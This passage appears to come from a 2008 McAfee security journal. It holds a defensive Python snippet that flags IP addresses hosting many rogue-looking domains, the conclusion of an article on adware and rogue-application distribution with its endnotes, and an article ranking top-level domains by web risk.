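    for host, ip in records:
        groups[ip].add(registered_domain(host))
    return {ip: sorted(doms) for ip, doms in groups.items()}


def flag_shared_hosts(records: Iterable[Record], threshold: int = 3,
                      min_rogue_share: float = 0.5) -> List[Tuple[str, int, float]]:
    """Return (ip, domain_count, rogue_share) for IPs fronting at least
    `threshold` registered domains of which at least `min_rogue_share`
    look rogue.  The share guards against ordinary shared hosting, where
    one address legitimately serves many unrelated sites.  Highest count
    first."""
    flagged = []
    for ip, doms in domains_per_ip(records).items():
        if len(doms) < threshold:
            continue
        share = sum(rogue_like(d) for d in doms) / len(doms)
        if share >= min_rogue_share:
            flagged.append((ip, len(doms), round(share, 2)))
    return sorted(flagged, key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    for ip, count, share in flag_shared_hosts(RECORDS):
        print(f"{ip}: {count} domains, {share:.0%} rogue-looking")
        for d in domains_per_ip(RECORDS)[ip]:
            print("   ", d)
```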

Figure 5: Multiple hostnames map to a single IP address that distributes localized rogue applications.

Each of the domains shown in Figure 5 displays either a custom rogue anti-spyware or rogue system cleaner product. The pages appear in various languages as well. In analyzing 620 pages, we found 24 languages used to create both pages and applications, which shows the threats have spread far beyond English-speaking countries. More than once, a single IP is associated with multiple domains; in some cases we saw up to 200 different domains. One query for the keyword FSA (which hosts-file.net describes as a class of domains hosting rogue applications) returned close to 3,600 domains distributing rogue applications.35

Conclusion
Looking solely at an analysis of statistics suggests that the growth of adware and spyware is on the decline. However, the intriguing social engineering tactics that are used to distribute these PUPs are still with us, delivering rogue applications and Trojans. With the increase of the server-side model (PPC) of ad delivery, we will certainly see improved social engineering tactics luring users to click on these ads and generate revenue for the affiliates. The distribution of adware and Trojans will continue to gain ground at social networking sites. Although the overall number of adware and spyware has declined, we see no easy solution in the near future to the problem of unwanted programs. Because adware companies pay for such installations, their moral duty should be to keep track of each installation and quickly stop any potential misdistribution of their software. But will they really do this? With the changing threat landscape and the increase in revenue-motivated Trojans, we have to remain vigilant and train employees and home users to better understand the threat of social engineering.

Aditya Kapoor is a senior researcher at McAfee Avert Labs. He was introduced to reverse engineering six years ago while researching at the University of Louisiana at Lafayette for his master's thesis, which focused on a sliding disassembly algorithm to tackle code obfuscation. At McAfee, Kapoor developed skills in rootkit analysis, byte code comparison, and behavior analysis. He enjoys traveling and studying different cultures and architectures.

ENDNOTES
1 http://www.antispywarecoalition.org/documents/2007glossary.htm
2 OptOut, Gibson Research Corp. http://www.grc.com/optout.htm
3 http://en.wikipedia.org/wiki/compensation_methods
4 Source: Zango web site. http://www.cdt.org/headlines/headlines.php?iid=51
5 http://www.benedelman.org/news/062907-1.html
6 http://en.wikipedia.org/wiki/compensation_methods#Pay-per-click_.28PPc.29
7 http://www.benedelman.org/ppc-scams/
8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx
9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/
10 http://www.secureworks.com/research/threats/ppc-hijack/
11 http://www.csc.com/cscworld/012007/dep/fh001.shtml
12 http://www.usgs.gov/conferences/presentations/5socialEngineeringInternalExternalThreat%20Dudeck.ppt
13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400-2550c479f95d/social_Engineering_Modeling.pdf
14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/
15 http://securitylabs.websense.com/content/alerts/1300.aspx
16 http://www.fortiguardcenter.com/advisory/Fga-2007-16.html
17 http://blog.washingtonpost.com/securityfix/2006/07/myspace_ad_served_adware_to_mo.html
18 http://securitylabs.websense.com/content/alerts/3061.aspx
19 http://securitylabs.websense.com/content/alerts/738.aspx
20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just-file-not-found/
21 http://www.cantoni.org/2008/06/04/google-notebook-spam
22 http://www.benedelman.org/spyware/nyag-dr/
23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html
24 http://www.internetlibrary.com/cases/lib_case358.cfm
25 http://blogs.zdnet.com/spyware/?p=655
26 http://www.ftc.gov/opa/2006/11/zango.shtm
27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm
28 http://onguardonline.gov/spyware.html
29 http://www.antispywarecoalition.org/
30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html
31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html
32 http://vil.nai.com/vil/content/v_130856.htm
33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3s-running-rampant/
34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches
35 http://hosts-file.net/?s=Browse&f=Fsa


How Risky Are Top-Level Domains?

By David Marcus

McAfee SiteAdvisor data shows how risk varies around the world.

In his excellent paper "Mapping the Mal Web, Revisited," published in the June 2008 issue of McAfee Security Insights,1 our colleague Shane Keats thoroughly examined the distribution of malicious web sites across the Internet using data from McAfee SiteAdvisor technology. In this day and age, people need to know where it is safe to surf and search. But if the Internet really is a big digital neighborhood, reflective of any big city in the world, which streets are safe to cross? Which domains are riskier than others? Which top-level domain (TLD) has shown the most improvement in safety? Which has shown the least? Which search words are riskier than others? Internet users ask themselves these questions more and more. The McAfee Security Journal is dedicated to helping you find those answers by providing data and analysis that help you make the best decisions possible.

In this edition, we summarize recent threat data regarding top-level domains: both generic TLDs (.com, .info, .biz, and so on) and country TLDs (.cn, .ru, .br, and others). We look closely not only at the present risk levels of these domains in the Americas, Europe, and Asia but also at how they have changed over the last year. We ranked each TLD by overall risk and then performed additional analysis of email practices, download safety, and the prevalence of web-based exploits; and we broke out the top twenty top-level domains for each type of risk. The results were striking. Risk is not spread equally across the Internet, as this data clearly illustrates. The generic and country domains showed varying types and degrees of risk and dangers. Some countries benefited from good email habits yet demonstrated poor download practices. Others suffered from hosting exploits or malicious code. We hope these results will help you as you surf. Remember to look both ways before crossing the Internet highway!

Reading the Graphs
In the chart labeled "Europe, Middle East, and Africa TLDs ranked by overall risk," you'll see in the left-most bar that Romania (domain .ro) registered almost seven percent. This means that, according to SiteAdvisor software, McAfee has found that almost seven percent of all sites within that top-level domain have suffered from one or more of the threats we've measured: browser exploits; adware, spyware, Trojans, or viruses; high-volume commercial email; affiliations with other risky sites; aggressive pop-up marketing; or SiteAdvisor community reviews or comments. The higher the figure, the greater the risk to users. In addition to an overall figure, we've charted the change in risk from the previous year. The line graph shows that in Romania the risk has increased by about one percent, whereas in Slovakia, for example, the risk has decreased by about three percent. Positive numbers indicate increased risk compared with the previous year; negative percentages indicate decreased risk.

David Marcus is Director of Security Research and Communications for McAfee Avert Labs. He brings Avert Labs' extensive security research to McAfee's customers and the greater security community. Marcus' current responsibilities include PR, media, and thought leadership, serving as blogmaster for McAfee Avert Labs Security Blog, as well as being co-host of AudioParasitics, The Official PodCast of McAfee Avert Labs. He also manages all publications from Avert Labs, including McAfee Security Journal.

ENDNOTE
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html


[Charts (only labels survived extraction; the plotted values are not recoverable):
• Europe, Middle East, and Africa TLDs ranked by overall risk
• Americas TLDs ranked by overall risk
• Asia TLDs ranked by overall risk
• Top 20 TLDs ranked by exploits
• Top TLDs ranked by email practices
• Top 20 TLDs ranked by download risk
Each chart plots Overall Risk 2008 (bars, percent of sites in the TLD) and Change in Risk 2007-2008 by points (line).
Risk criteria used to measure TLDs: browser exploits; adware/spyware/Trojans/viruses; high-volume commercial email; affiliations with other risky sites; aggressive pop-up marketing; SiteAdvisor community reviews/comments.]
